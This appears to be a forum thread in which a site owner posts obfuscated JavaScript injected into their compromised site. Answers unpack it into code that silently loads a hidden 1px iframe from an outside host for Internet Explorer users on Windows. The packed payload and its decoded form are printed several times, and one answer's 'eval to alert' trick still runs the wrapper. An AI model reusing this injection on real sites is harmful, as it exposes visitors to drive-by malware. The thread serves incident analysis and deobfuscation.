
JavaScript code injected into site: Can you help me decrypt it?

Recently I was the victim of a web attack, which seemed to take various PHP server vars, then forward them to an attacker's website (IPs of visitor/website, referrer, user agent, etc.). Then it would get the file it sent the URL request to, and echo() it to source.

I know you get MANY of these sorts of requests (mostly as poor man's XSS attempts), but I would really appreciate some help here, as I don't have much experience with JS. It took me several hours of PHP unscrambling to figure out what it did, and after passing some dummy info, it returned this (which was being echoed into source):

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|25u|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|500|asso|navigator|com|showthread|php|72291731'.split('|'),0,{}))

Thank you for your time and patience with this matter.

Simply replace eval with alert.

It yields the following:

function MakeFrameEx(){
    element=document.getElementById('yahoo_api');
    if(!element){
        var el=document.createElement('iframe');
        document.body.appendChild(el);
        el.id='yahoo_api';
        el.style.width='1px';
        el.style.height='1px';
        el.style.display='none';
        el.src='http://asso.25u.com/showthread.php?t=72291731'
    }
}

var ua=navigator.userAgent.toLowerCase();

if(((ua.indexOf("msie")!=-1
    &&ua.indexOf("opera")==-1
    &&ua.indexOf("webtv")==-1))
    &&ua.indexOf("windows")!=-1)
{
    var t=setTimeout("MakeFrameEx()",500);
}

After doing the alert(), CTRL+C the dialog to get the contents, then use a JS beautifier to get some readable code.

Also note that for some browsers, like Firefox, there are plugins to do this automatically. Some browsers even do this automatically (MSIE).
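As an added example (not from the question or either answer), the same unpacking done statically: this reimplements the decode step of the "p,a,c,k,e,d" packer in JavaScript, so the payload quoted above is read as text and never executed, whereas replacing eval with alert still runs the attacker's wrapper function in the browser. The function names (tokenFor, unpack, unpackWrapper) are mine.

```javascript
// Added example: a static unpacker for the "eval(function(p,a,c,k,e,d){...})" packer
// used by the payload in the question. It rebuilds the packer's dictionary and
// substitutes tokens itself, so the attacker's code is never passed to eval() or alert().

// Inverse of the packer's e(): map a dictionary index to its token in base `base`
// (0-9 and a-z cover 0..35; 36 and up become 'A', 'B', ... via charCode + 29).
function tokenFor(index, base) {
  const head = index < base ? '' : tokenFor(Math.floor(index / base), base);
  const digit = index % base;
  return head + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Rebuild d[] as the packer does and replace every \b\w+\b word in p with its
// keyword. An empty k[i] means the token stood for itself (e.g. the literal 1).
function unpack(p, a, c, k) {
  const dict = new Map();
  for (let i = 0; i < c; i++) dict.set(tokenFor(i, a), k[i] || tokenFor(i, a));
  return p.replace(/\b\w+\b/g, (word) => (dict.has(word) ? dict.get(word) : word));
}

// Extract p, a, c and the keyword list from the wrapper with a regex, then unpack.
// Only the \' and \\ escapes the packer emits inside its string literals are undone.
function unpackWrapper(source) {
  const m = source.match(
    /\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)/
  );
  if (!m) throw new Error('not a p,a,c,k,e,d payload');
  const unescape = (s) => s.replace(/\\(.)/g, '$1');
  return unpack(unescape(m[1]), Number(m[2]), Number(m[3]), unescape(m[4]).split('|'));
}

// Sample input: the eval(...) statement quoted in the question, kept verbatim
// (String.raw preserves its backslashes). It is data here and is never executed.
const PACKED = String.raw`eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|25u|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|500|asso|navigator|com|showthread|php|72291731'.split('|'),0,{}))`;

// Deobfuscated text: inspect it for the hidden-iframe drop instead of running it.
const UNPACKED = unpackWrapper(PACKED);
console.log(UNPACKED);
```

The output is the same MakeFrameEx()/setTimeout code the answers show, on one line; the URL in el.src is the indicator worth searching the rest of the compromised site for.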

This was some obfuscated code. I deobfuscated it and this is what it does:

function MakeFrameEx() {
    element = document.getElementById('yahoo_api');
    if (!element) {
        var el = document.createElement('iframe');
        document.body.appendChild(el);
        el.id = 'yahoo_api';
        el.style.width = '1px';
        el.style.height = '1px';
        el.style.display = 'none';
        el.src = 'http://asso.25u.com/showthread.php?t=72291731'
    }
}
var ua = navigator.userAgent.toLowerCase();
if (((ua.indexOf("msie") != -1 && ua.indexOf("opera") == -1 && ua
    .indexOf("webtv") == -1))
    && ua.indexOf("windows") != -1) {
    var t = setTimeout("MakeFrameEx()", 500)
}

Here is the deobfuscated JavaScript code:

 function MakeFrameEx()
 {
   element=document.getElementById('yahoo_api');
   if(!element)
   {
     var el=document.createElement('iframe');
     document.body.appendChild(el);
     el.id='yahoo_api';
     el.style.width='1px';
     el.style.height='1px';
     el.style.display='none';
     el.src='http://asso.25u.com/showthread.php?t=72291731'
   }
 }
 var ua=navigator.userAgent.toLowerCase();
 if(((ua.indexOf("msie")!=-1&&ua.indexOf("opera")==-1&&ua.indexOf("webtv")==-1))&&ua.indexOf("windows")!=-1)
 {
   var t=setTimeout("MakeFrameEx()",500)
 }
